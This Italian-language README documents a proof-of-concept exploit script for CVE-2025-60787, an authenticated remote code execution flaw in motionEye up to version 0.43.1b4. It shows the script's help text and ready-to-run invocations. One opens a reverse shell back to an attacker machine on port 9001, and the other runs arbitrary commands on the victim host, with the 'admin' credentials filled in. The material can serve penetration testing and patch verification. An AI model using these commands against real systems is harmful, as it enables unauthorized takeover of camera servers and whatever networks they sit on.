
PoC automatizzato per CVE-2025-60787 che fornisce esecuzione remota di codice autenticata contro server motionEye fino alla versione 0.43.1b4, con modalità di reverse shell ed esecuzione di comandi.
PoC per CVE-2025-60787, una vulnerabilità RCE autenticata per motionEye con tutte le versioni interessate fino alla 0.43.1b4 (inclusa).
Questo è un PoC automatizzato per la vulnerabilità descritta in questo repository. Crediti a prabhatverma47.
Lo script ha 2 comandi che sfruttano la vulnerabilità. Uno che invia direttamente una reverse shell chiamato revshell e un altro comando chiamato command per eseguire direttamente comandi sfruttando questa CVE.
❯ python3 CVE-2025-60787.py -h
usage: CVE-2025-60787.py [-h] {revshell,command} ...
PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x
positional arguments:
{revshell,command} Choose between send a reverse shell or (attempting to) run commands
revshell Attempt to send a reverse shell using CVE-2025-60787 vuln
command Execute a command remotely using CVE-2025-60787 vuln
options:
-h, --help show this help message and exit
Usa il comando revshell per ottenere una shell. Per esempio:
python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001
Dove 10.10.10.10 è la macchina target (la macchina che esegue motionEye), 10.10.10.15 è la nostra macchina attaccante e 9001 è la porta su cui siamo in ascolto per catturare una reverse shell.
Se invece di una reverse shell vogliamo eseguire altri comandi remotamente, possiamo usare l'opzione command. Per esempio, esegui il comando ping -c1 10.10.10.15 nella macchina vittima:
python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'
Dove 10.10.10.10 è la macchina che esegue motionEye.
Usa questo script sempre sotto la tua responsabilità.
Sii etico (: